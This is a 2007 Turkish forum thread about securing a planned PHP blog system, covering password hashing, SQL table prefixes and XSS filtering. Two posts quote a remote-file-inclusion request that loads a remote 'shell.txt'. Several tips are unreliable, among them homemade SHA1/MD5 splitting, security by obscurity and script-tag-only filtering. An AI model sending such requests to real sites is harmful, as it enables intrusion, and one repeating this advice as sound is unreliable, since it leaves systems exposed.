• 24-01-2007, 00:23:04
    #10
    Kurumsal PLUS
    osman adlı üyeden alıntı: mesajı görüntüle
    md5sumların çevrilmesi imkansız
    gdataonline.com

    md5 veritabanı yaratıp değer sorgulatıyorlar. tabi ki karışık bi şifreyi kıramazlar

    @saho, smf gibi şifreyi 2 parça yapmanı öneririm. mesela veritabanında 2 tane alan oluşturursun, sifre1 ve sifre2 şeklinde.

    gerçek şifrenin sha1 değerini son 4 karakteri hariç sifre1'e yazdır. son 4 karakterini de md5'le şifreleyip sifre2'ye yazdır.

    karışık ama dbden şifrelerin asla çalınamayacağı bişi yaratabilirsin böyle kombinasyonlar yaratarak
  • 24-01-2007, 09:21:02
    #11
    md5 yerine sha1 kullanılabilir.
  • 24-01-2007, 09:22:31
    #12
    Kimlik doğrulama veya yönetimden onay bekliyor.
    adsesne optımızasyonu olursa super olur
    normalde hangı blogu kullanırsan kullan reklamı koyuyorsun burun hepsınde çıkıyor fılan
  • 24-01-2007, 09:52:38
    #13
    Üyeliği durduruldu
    bartuc un söylediğide mantıklı kendi algoritmamızı şifre kısmında kullanmalıyız ki açık kaynaktaki açık sorunları doğmasın %100 yoktur ama incelenir sha1 ve md5 olarak 2 ayrı tablo yazıp oradan sistem in kendi mantığına göre sondan 2 tane baştan 1 tane falan gibi alıp karışık birşeyler yapmak gerekecek snrm + md5 sha1 ayrı tablolar ayrı okunma sistemi
    username='' and userpass='' değil yani oldukça güzel bir koruma olacak kanısındayım
    ama şuda var yönetici adresini değişince blog a giriş yapamazlar zaten
    + mysql prefixleri değişebilir olmalı hatta bunu kurulumda zorunlu kılarsam sql injeksiyonların önü temelli kapanaabilir mesala
    wp_admins tir %90 wordpress te nuke de nuke_authors tu nuke de bunu deişince
    uoıh34_authors yapınca adam nın sallama yoluyla bulması çok zor olacak şifreyi ayrı bir algoritma yönetim sayfa adını kişinin kendi isteiğine göre dğeişmesi ve sql tablo adlarını değişmesi oldukça iyi olacaktır bence güvenlik açısından kaldı geriye xss

    Xss Hacki Engellemek | Son zamanlarda bir Çok ki?inin can?n? yakan hack y | Makaleler-Dersler

    burada vardı <script> falan görünce die olarak çıktı veriyorpost ta falan nerede
    (makalede sorun var az önce farkettim db ye atarken addslashes çift slashes yapmış kodlarda okurken stripslashes ikisini birden silmiş slashes lerin slashses lerle çalışıyor yani )
    http://www.phptrcms.com/?x=http://ww....com/shell.txt
    Yazdığınız Kodlar İzinli Kodlar Listesinde Değil
    AMAN ALLAH'IM HACKER N'OLUR BENİ HACKLAMA
    gibi ...
  • 24-01-2007, 09:54:09
    #14
    Üyeliği durduruldu
    AMAN ALLAH'IM HACKER N'OLUR BENİ HACKLAMA
    bunuda unutmadık haa var sa yeni xss taglar gerçi genelde <script> ile yapılıyor post ve get leri tarıyor sitede başka önerileriniz varsa tabiki kullanırız
  • 24-01-2007, 21:58:12
    #15
    Üyeliği durduruldu
    saho adlı üyeden alıntı: mesajı görüntüle
    bartuc un söylediğide mantıklı kendi algoritmamızı şifre kısmında kullanmalıyız ki açık kaynaktaki açık sorunları doğmasın %100 yoktur ama incelenir sha1 ve md5 olarak 2 ayrı tablo yazıp oradan sistem in kendi mantığına göre sondan 2 tane baştan 1 tane falan gibi alıp karışık birşeyler yapmak gerekecek snrm + md5 sha1 ayrı tablolar ayrı okunma sistemi
    username='' and userpass='' değil yani oldukça güzel bir koruma olacak kanısındayım
    ama şuda var yönetici adresini değişince blog a giriş yapamazlar zaten
    + mysql prefixleri değişebilir olmalı hatta bunu kurulumda zorunlu kılarsam sql injeksiyonların önü temelli kapanaabilir mesala
    wp_admins tir %90 wordpress te nuke de nuke_authors tu nuke de bunu deişince
    uoıh34_authors yapınca adam nın sallama yoluyla bulması çok zor olacak şifreyi ayrı bir algoritma yönetim sayfa adını kişinin kendi isteiğine göre dğeişmesi ve sql tablo adlarını değişmesi oldukça iyi olacaktır bence güvenlik açısından kaldı geriye xss

    Xss Hacki Engellemek | Son zamanlarda bir Çok ki?inin can?n? yakan hack y | Makaleler-Dersler

    burada vardı <script> falan görünce die olarak çıktı veriyorpost ta falan nerede
    (makalede sorun var az önce farkettim db ye atarken addslashes çift slashes yapmış kodlarda okurken stripslashes ikisini birden silmiş slashes lerin slashses lerle çalışıyor yani )
    http://www.phptrcms.com/?x=http://ww....com/shell.txt
    Yazdığınız Kodlar İzinli Kodlar Listesinde Değil
    AMAN ALLAH'IM HACKER N'OLUR BENİ HACKLAMA
    gibi ...
    ama çoğu kişinin kullanmadığı ve yine çoğunun başını yakan mysql trace hataları sayesinde tablo isimlerin kabak gibi orataya çıkıyor sadece @ koyacaklar neden üşeniyorlarsa :\
  • 25-01-2007, 09:11:21
    #16
    Üyeliği durduruldu
    ama programlama aşamasında o hataları görmemiz gerekebiliyor daha sonra unutulabiliyor
  • 25-01-2007, 16:28:20
    #17
    Kurumsal PLUS
    altayalp adlı üyeden alıntı: mesajı görüntüle
    md5 yerine sha1 kullanılabilir.
    sha1 algoritmasını kırmış çinliler..